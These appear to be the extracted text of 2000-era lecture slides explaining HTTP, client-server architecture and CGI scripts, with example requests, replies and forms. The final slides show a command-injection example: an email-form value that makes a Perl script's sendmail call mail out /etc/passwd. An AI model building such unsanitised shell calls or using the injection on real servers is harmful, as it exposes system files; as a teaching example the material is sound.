WWW: an Internet application
Bill Chu
© Bei-Tseng Chu Aug 2000
WWW Web and HTTP
WWW web is an interconnected information servers
each server maintains a collection of documents a client can request a document from any info server one document can refer another document in any
information server via a Hyper link HTTP is the application protocol that defines
the WWW server-client interactions HTTP server maintains the HTTP documents HTTP client obtains and displays the HTTP docs
© Bei-Tseng Chu Aug 2000
The client and server architecture A client connects to a server to
send and receive information A server typically a “large”
computer that is capable of handling multiple client requests at the same time.
The WWW is the universal client server architecture.
© Bei-Tseng Chu Aug 2000
Benefits of the Client Server architecture Effective model for information sharing
Server makes information available for multiple clients
Clients are sure to receive the most up to date information
Server technology can be changed (e.g. a database change) without effecting clients
Clients can be dispersed geographically Server maintenance is easier since if all
clients are connecting to one place.
© Bei-Tseng Chu Aug 2000
Protocol A protocol is a series of steps, involving two or
more parties, designed to accomplish a task Everyone involved in the protocol must know
the protocol and all of the steps to follow in advance
Everyone in the protocol must agree to follow it
The protocol must be unambiguous; each step must be well defined and there must be no chance of a misunderstanding.
The protocol must be complete; there must be a specified action for every possible situation.
© Bei-Tseng Chu Aug 2000
HyperText Transfer Protocol (HTTP) Address: IP address + TCP port 80 Format:
HTTP request formatRequest request-URL HTTP-version0 or more headers<blank line>Body if it is a POST request
HTTP reply formatHTTP-version response-code response-phrase0 or more headers<blank line>body (HTTP document)
Rules: client sends a HTTP request to server server sends back a HTTP reply
© Bei-Tseng Chu Aug 2000
ExampleStep one: wait for a new request
The httpd program waits for a request to arrive from some client somewhere on the Internet.
The server program listens on a port and is dormant at this state (default 80).
© Bei-Tseng Chu Aug 2000
Step two: A request arrives from a client A user might have typed in a URL at a
browser: http://www.anywhere.com/sample.html
The browser will request a connection with the server at www.anywhere.com
The browser issues GET /sample.html http/1.0User-agent: Mosaic for X Windows/2.4Accept: text/plainAccept: text/htmlAccept: images/*
© Bei-Tseng Chu Aug 2000
Step three: The server parses the request The server decodes the message
according to http protocol and determines what it should do:
Method: GETDocument: /sample.htmlProtocol: http, Version 1.0User agent: Mosaic for X Window/2.4Accept: text/plain,text/html, image/*
© Bei-Tseng Chu Aug 2000
Step four: Do the method requested
The httpd program fulfills the request. To GET a document, the server looks up the file (/sample.html) in its document
tree Success: document sentHTTP/1.0 200 Document followsServer: NCSAV1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/htmlContent-length: 1066Last-modified: Thu, 20 Jul 2000 20:38:00 GMT Failure: an error is sentHTTP/1.0 403 Not FoundServer NCSA/1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/htmlContent-length: 0
© Bei-Tseng Chu Aug 2000
Step five: Finish up: close file; close network connection When the file is completely sent or
an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.
The client receives the data and formats it according to http tags.
The server is now ready for more requests and it goes to step 1.
© Bei-Tseng Chu Aug 2000
Web scripts and CGI Web script is a program that can be
executed by the web server in response to web requests.
Any program can be a web script, there is no mandatory language
Common Gateway Interface (CGI) is a standard for how scripts can be called (by httpd) and how data is passed between the httpd server and the script
© Bei-Tseng Chu Aug 2000
ExampleStep one: wait for a new request
The httpd program waits for a request to arrive from some client somewhere on the Internet.
The server program listens on a port and is dormant at this state.
© Bei-Tseng Chu Aug 2000
Step two: A request arrives from a client A user might have typed in a URL at a browser:
http://www.anywhere.com/scripts/how_busy_are_you The browser will request a connection with the server at
www.anywhere.com The browser issues GET /scripts/how_busy_are_you http/1.0User-agent: Mosaic for X Windows/2.4Accept: text/plainAccept: text/htmlAccept: images/*
© Bei-Tseng Chu Aug 2000
Step three: Do the method requested
The httpd program fulfills the request by executing the script. The server knows it is a script because it is a file under the direction “script”. The name of the “script” directory is set at web server configuration time.
To GET the script, the server looks up the file (/scripts/how_busy_are_you) in its document tree
Success: the output of the script (normally directed to the screen) is sent to browser
HTTP/1.0 200 Document followsServer: NCSAV1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/plain11:35am up 7 days, 4:35, 5 users, load average: 0.00, 0.09, 0.00 Failure: an error is sentHTTP/1.0 200 Document followsServer: NCSAV1.4Date: Thu, 20 Jul 2000 22:00:00 GMTContent-type: text/plainCannot find uptime command on this system
© Bei-Tseng Chu Aug 2000
Step four: Finish up: close file; close network connection When the file is completely sent or
an error message is sent, the httpd server is finished with its work. It closes the file and closes the network connection.
The client receives the data and formats it according to http tags.
The server is now ready for more requests and it goes to step 1.
© Bei-Tseng Chu Aug 2000
Scripts and forms<TITLE> Form for CSO PH Query </TITLE><H1> Form for CSO PH Query </H1>This form will send a PH query to the specified ph server<p><hr><form ACTION="http://www.server.org:80/scripts/directory_assistance">PH server: <INPUT TYPE="text" Name="Jserver" VALUE="ns.anywhere.com" MAXLENTH="256"><dd><input type="checkbox" NAME="doname" VALUE="yes"> Return name? </dd><dd><input type="checkbox" NAME="dophone" VALUE="yes"> Return phone? </dd><dd><input type="checkbox" NAME="doemail" VALUE="yes"> Return email? </dd>
<H3> At least one of the following fields must be specified: </h3><ul><li> <input type="text" NAME="Qname" MAXLENGTH="256"> Name<li> <input type="text" Name="Qname" MAXLENGTH="256"> Email</ul><input type="submit"> </form>
© Bei-Tseng Chu Aug 2000
© Bei-Tseng Chu Aug 2000
Passing arguments to web scripts When the submit button is clicked the browser sends:GET
http://www.anywhere.com:80/scripts/directory_assistant?
Jserver=ns.anywhere.com&doname=yes&dophone=yes&Qname=&[email protected]
http/1.0
© Bei-Tseng Chu Aug 2000
HTTP request methods GET: retrieve information from the server. It is
the most commonly used. It can also be used in conjunction of CGI to pass parameters to the server
HEAD: it is identical to GET, except that the server does not return a document. It is useful for verifying a document exists for checking links or time of modification
POST: allows the server to receive data from the client. It is most commonly used to send the data in HTML forms to the server for processing.
© Bei-Tseng Chu Aug 2000
Security risks for CGI Consider a web-based email form:<form
ACTION="http://www.coolmail.com/scripts/sendmail.pl"><ul><li> email: <input type="text" NAME="email"
MAXLENGTH="256"> <li> message: <input type="text" NAME="message"
SIZE=46 MAXLENGTH="2560"> </ul><hr><input type="submit" VALUE="Send"></form>
© Bei-Tseng Chu Aug 2000
© Bei-Tseng Chu Aug 2000
Security problem Suppose the pearl script saves the message
into a temp file and executes the unix command:
sendmail [email protected] <temp A malicious user could type in the field for
email address: [email protected] </etc/passwd; This turns into: sendmail
[email protected]</etc/passwd;<temp